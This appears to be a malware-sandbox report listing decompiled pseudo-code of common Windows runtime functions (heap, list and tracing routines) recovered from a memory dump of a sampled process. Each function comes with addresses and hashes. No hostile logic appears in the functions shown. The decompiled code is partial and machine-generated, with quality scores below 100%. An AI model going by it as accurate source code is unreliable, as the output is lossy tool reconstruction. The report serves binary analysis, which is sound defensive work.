				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E00ADD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E00ABE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L00AA4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E00ACF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E00ABA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                    0x00ac90af
                                                    0x00ac90b8
                                                    0x00ac90bb
                                                    0x00ac90bf
                                                    0x00ac90c2
                                                    0x00ac90c2
                                                    0x00ac90c8
                                                    0x00ac90cb
                                                    0x00ac90cd
                                                    0x00b014d7
                                                    0x00b014eb
                                                    0x00b014eb
                                                    0x00000000
                                                    0x00b014eb
                                                    0x00b014db
                                                    0x00b014e6
                                                    0x00000000
                                                    0x00b014f2
                                                    0x00b014e8
                                                    0x00000000
                                                    0x00b014e8
                                                    0x00ac90d8
                                                    0x00ac90da
                                                    0x00ac90dd
                                                    0x00ac90e5
                                                    0x00000000
                                                    0x00ac9139
                                                    0x00ac90fa
                                                    0x00ac90fe
                                                    0x00ac9142
                                                    0x00000000
                                                    0x00ac9142
                                                    0x00ac9104
                                                    0x00ac9107
                                                    0x00ac910b
                                                    0x00ac9110
                                                    0x00ac9118
                                                    0x00ac9147
                                                    0x00ac9148
                                                    0x00ac914f
                                                    0x00ac9150
                                                    0x00ac9151
                                                    0x00ac9152
                                                    0x00ac9156
                                                    0x00ac915d
                                                    0x00ac9160
                                                    0x00ac9168
                                                    0x00ac916c
                                                    0x00ac91bc
                                                    0x00ac91be
                                                    0x00000000
                                                    0x00ac91be
                                                    0x00ac916e
                                                    0x00ac9173
                                                    0x00ac9176
                                                    0x00000000
                                                    0x00000000
                                                    0x00ac917c
                                                    0x00ac9180
                                                    0x00ac91b5
                                                    0x00000000
                                                    0x00ac91b5
                                                    0x00ac9182
                                                    0x00ac9185
                                                    0x00ac9189
                                                    0x00000000
                                                    0x00000000
                                                    0x00ac918e
                                                    0x00ac9190
                                                    0x00ac9198
                                                    0x00000000
                                                    0x00000000
                                                    0x00ac91a0
                                                    0x00000000
                                                    0x00ac91ad
                                                    0x00ac91ad
                                                    0x00ac91b0
                                                    0x00ac91b1
                                                    0x00000000
                                                    0x00ac9185
                                                    0x00ac911a
                                                    0x00ac911c
                                                    0x00ac911f
                                                    0x00ac9125
                                                    0x00ac9127
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                    • Instruction ID: 0b54aa05125b6ce45d1b46129bcee68a95a68d2e917e2268b2f3ef1edee36273
                                                    • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                    • Instruction Fuzzy Hash: 96217C71A00205EFDB20DF59C949EAAFBF8EB54310F15896EE949A7251D370ED00CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AB3B7A Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E00AB3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0xb784c4; // 0x0
				_v12 = 1;
				_v8 =  *0xb784c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L00AA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0xb784c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E00ACAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E00ACFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0xb784c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0xb784c4; // 0x0
					L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                    0x00ab3b89
                                                    0x00ab3b96
                                                    0x00ab3ba1
                                                    0x00ab3bab
                                                    0x00ab3bb5
                                                    0x00ab3bb9
                                                    0x00af6298
                                                    0x00ab3bbf
                                                    0x00ab3bc2
                                                    0x00ab3bc3
                                                    0x00ab3bc9
                                                    0x00ab3bca
                                                    0x00ab3bcc
                                                    0x00ab3bcd
                                                    0x00ab3bd4
                                                    0x00ab3bd6
                                                    0x00ab3bdb
                                                    0x00ab3bea
                                                    0x00ab3bf7
                                                    0x00ab3bfb
                                                    0x00ab3bff
                                                    0x00ab3c09
                                                    0x00ab3c0a
                                                    0x00ab3c0b
                                                    0x00ab3c0f
                                                    0x00ab3c14
                                                    0x00ab3c18
                                                    0x00ab3c18
                                                    0x00ab3bfb
                                                    0x00ab3c1b
                                                    0x00ab3c30
                                                    0x00ab3c30
                                                    0x00ab3c3d

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 938a48ab9622ee20043632c501610e5e02564780ad78737a255c03dbe9d1545c
                                                    • Instruction ID: d7d8ad6b96ec2429d4bf710120cd288e9bd201934846754b495b5b51ec5e2393
                                                    • Opcode Fuzzy Hash: 938a48ab9622ee20043632c501610e5e02564780ad78737a255c03dbe9d1545c
                                                    • Instruction Fuzzy Hash: D0218372A00109AFCB00DF98CD85F6AB7BDFB45748F150068F508AB252D771AD45DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B06CF0 Relevance: .1, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 80%
                                                    			E00B06CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E00AA7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E00AA7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0xa65c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E00ABF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E00ABF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E00B07016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L00AA2400( &_v52);
								}
								_t21 = L00AA2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                    0x00b06cfb
                                                    0x00b06d00
                                                    0x00b06d02
                                                    0x00b06d06
                                                    0x00b06d0a
                                                    0x00b06d0e
                                                    0x00b06d19
                                                    0x00b06d2b
                                                    0x00b06d1b
                                                    0x00b06d24
                                                    0x00b06d24
                                                    0x00b06d33
                                                    0x00b06d39
                                                    0x00b06d46
                                                    0x00b06d4f
                                                    0x00b06d61
                                                    0x00b06d51
                                                    0x00b06d5a
                                                    0x00b06d5a
                                                    0x00b06d69
                                                    0x00b06d6b
                                                    0x00b06d6d
                                                    0x00b06d6f
                                                    0x00b06d6f
                                                    0x00b06d74
                                                    0x00b06d79
                                                    0x00b06d7a
                                                    0x00b06d7f
                                                    0x00b06d82
                                                    0x00b06d88
                                                    0x00b06d89
                                                    0x00b06d90
                                                    0x00b06d94
                                                    0x00b06da7
                                                    0x00b06db1
                                                    0x00b06db1
                                                    0x00b06dbb
                                                    0x00b06dbb
                                                    0x00b06d90
                                                    0x00b06d69
                                                    0x00b06d46
                                                    0x00b06dc6

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 427ddda487aa10372032a29114106a507aff45b069bb709d58e278038e8f9421
                                                    • Instruction ID: d9cbf2a3745df6012ad51926595384b0c8d1aa4c3dfb8f1929024c1dc46736db
                                                    • Opcode Fuzzy Hash: 427ddda487aa10372032a29114106a507aff45b069bb709d58e278038e8f9421
                                                    • Instruction Fuzzy Hash: 6421B3726046459FC711DF29C944BABBBECEF91750F0406A6B94087292E734D918C6A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B5070D Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E00B5070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E00B507DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E00B4AFDE( &_v8,  &_v12);
					E00B51293(_t38, _v28, _t60);
					if(E00AA7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E00B414FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                    0x00b5071b
                                                    0x00b50724
                                                    0x00b50734
                                                    0x00b50738
                                                    0x00b5074b
                                                    0x00b5074b
                                                    0x00b50753
                                                    0x00b50753
                                                    0x00b50759
                                                    0x00b5075d
                                                    0x00b50774
                                                    0x00b50779
                                                    0x00b5077d
                                                    0x00b50789
                                                    0x00b50795
                                                    0x00b507a7
                                                    0x00b50797
                                                    0x00b507a0
                                                    0x00b507a0
                                                    0x00b507af
                                                    0x00b507c4
                                                    0x00b507cd
                                                    0x00b507cd
                                                    0x00b507af
                                                    0x00b507dc

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                    • Instruction ID: aec1b669b2d7aa8ccbbd23508576769a2268b7156c1b4bef0b7d6d487a6e750c
                                                    • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                    • Instruction Fuzzy Hash: B021D4362042049FD715EF18C885B6ABBE5EFC4750F0485A9FD959B386D730ED09CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AAAE73 Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 96%
                                                    			E00AAAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E00AA7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E00AA7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E00AA7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E00AA7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E00B07794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                    0x00aaae78
                                                    0x00aaae7c
                                                    0x00aaae7e
                                                    0x00aaae81
                                                    0x00aaae86
                                                    0x00aaae8d
                                                    0x00af2691
                                                    0x00aaae93
                                                    0x00aaae93
                                                    0x00aaae93
                                                    0x00aaae98
                                                    0x00aaae9d
                                                    0x00af26a2
                                                    0x00af26b4
                                                    0x00af26a4
                                                    0x00af26ad
                                                    0x00af26ad
                                                    0x00af26b9
                                                    0x00000000
                                                    0x00af26bb
                                                    0x00000000
                                                    0x00af26bb
                                                    0x00aaaea3
                                                    0x00aaaea3
                                                    0x00aaaea3
                                                    0x00aaaeaa
                                                    0x00af26c0
                                                    0x00af26c9
                                                    0x00af26c9
                                                    0x00aaaeb3
                                                    0x00af26d4
                                                    0x00af26e1
                                                    0x00000000
                                                    0x00000000
                                                    0x00af26e7
                                                    0x00af26ee
                                                    0x00af26f0
                                                    0x00af26f9
                                                    0x00af26f9
                                                    0x00af2702
                                                    0x00af2708
                                                    0x00af2708
                                                    0x00af270b
                                                    0x00af270f
                                                    0x00af2711
                                                    0x00af2711
                                                    0x00af2725
                                                    0x00af2725
                                                    0x00000000
                                                    0x00aaaeb9
                                                    0x00aaaeb9
                                                    0x00aaaebf
                                                    0x00aaaebf
                                                    0x00aaaeb3

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                    • Instruction ID: 0b6d54223163e2c3cd455345fcee709766fbe8d4e7dc57c9393dfef3d3399608
                                                    • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                    • Instruction Fuzzy Hash: 0E21D1326056889FD7269BA9C944B3677E8EF55340F1900A0FE04CB6E2E739DC40CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B07794 Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E00B07794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0xb77b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L00AA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E00ACF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E00AA7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E00AC9AE0();
					_t24 = L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                    0x00b07799
                                                    0x00b0779a
                                                    0x00b0779b
                                                    0x00b077a3
                                                    0x00b077ab
                                                    0x00b077ae
                                                    0x00b077b1
                                                    0x00b077b1
                                                    0x00b077bf
                                                    0x00b077c4
                                                    0x00b077c8
                                                    0x00b077ce
                                                    0x00b077d4
                                                    0x00b077e0
                                                    0x00b077e0
                                                    0x00b077d6
                                                    0x00b077d6
                                                    0x00b077de
                                                    0x00000000
                                                    0x00000000
                                                    0x00b077de
                                                    0x00b077e5
                                                    0x00b077f0
                                                    0x00b077f3
                                                    0x00b077f6
                                                    0x00b077fd
                                                    0x00b07800
                                                    0x00b0780c
                                                    0x00b07818
                                                    0x00b0782b
                                                    0x00b0781a
                                                    0x00b07823
                                                    0x00b07823
                                                    0x00b07830
                                                    0x00b07831
                                                    0x00b07838
                                                    0x00b0783d
                                                    0x00b0783e
                                                    0x00b0784f
                                                    0x00b0784f
                                                    0x00b0785a

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8088f9ee21d228afec9f9fa1dcdcd96f4db50a9935f12bcfe96e885e81b6dbeb
                                                    • Instruction ID: 747fb17044cec81e0697c052c30397bdb3438de71aeca6d0962eeb1258b199f0
                                                    • Opcode Fuzzy Hash: 8088f9ee21d228afec9f9fa1dcdcd96f4db50a9935f12bcfe96e885e81b6dbeb
                                                    • Instruction Fuzzy Hash: DD21BB72904604ABC725DB69DC84E6BBBA8EF48340F10416DF50AC7790EA34ED00CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ABFD9B Relevance: .1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E00ABFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E00A976E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L00AA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                    0x00abfd9b
                                                    0x00abfda0
                                                    0x00abfda1
                                                    0x00abfdab
                                                    0x00abfdad
                                                    0x00abfdb0
                                                    0x00abfdb8
                                                    0x00abfe0f
                                                    0x00abfde6
                                                    0x00abfde9
                                                    0x00abfdec
                                                    0x00afc0c0
                                                    0x00abfdfe
                                                    0x00abfe06
                                                    0x00abfe06
                                                    0x00afc0c8
                                                    0x00abfe2d
                                                    0x00abfe2d
                                                    0x00000000
                                                    0x00abfe2d
                                                    0x00afc0d1
                                                    0x00afc0e0
                                                    0x00afc0e5
                                                    0x00afc0e5
                                                    0x00afc0e8
                                                    0x00000000
                                                    0x00afc0e8
                                                    0x00abfdf4
                                                    0x00000000
                                                    0x00000000
                                                    0x00abfdf6
                                                    0x00abfdfa
                                                    0x00abfe1a
                                                    0x00abfe1f
                                                    0x00abfe1f
                                                    0x00abfdfc
                                                    0x00000000
                                                    0x00abfdfc
                                                    0x00abfdcc
                                                    0x00abfdd0
                                                    0x00abfe26
                                                    0x00000000
                                                    0x00abfe26
                                                    0x00abfdd8
                                                    0x00abfddb
                                                    0x00abfddd
                                                    0x00abfde0
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                    • Instruction ID: fdf4f97c7046737d18a086e0045b86e6cf23b71a0931f42456f700cba7954496
                                                    • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                    • Instruction Fuzzy Hash: 2B216A72600A44DFC735CF4ACA40AA6F7F9EB94B10F28817EE94587622D730DC00DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A89240 Relevance: .1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E00A89240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0xb5f708);
				E00ADD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E00AC95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E00AC95D0();
				_t33 =  *0xb784c4; // 0x0
				L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0xb784c4; // 0x0
				L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0xb784c4; // 0x0
				E00AA2280(L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0xb786b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E00AC95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E00AC95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E00A89325();
					_t50 =  *0xb784c4; // 0x0
					return E00ADD0D1(L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                    0x00a89240
                                                    0x00a89242
                                                    0x00a89247
                                                    0x00a8924c
                                                    0x00a8924e
                                                    0x00a89255
                                                    0x00a89257
                                                    0x00a8925a
                                                    0x00a8925f
                                                    0x00a8925f
                                                    0x00a89266
                                                    0x00a89271
                                                    0x00a89276
                                                    0x00a89279
                                                    0x00a8927e
                                                    0x00a89295
                                                    0x00a8929a
                                                    0x00a892b1
                                                    0x00a892b6
                                                    0x00a892d7
                                                    0x00a892dc
                                                    0x00a892e0
                                                    0x00a892e6
                                                    0x00a892e8
                                                    0x00a892ee
                                                    0x00a89332
                                                    0x00a89333
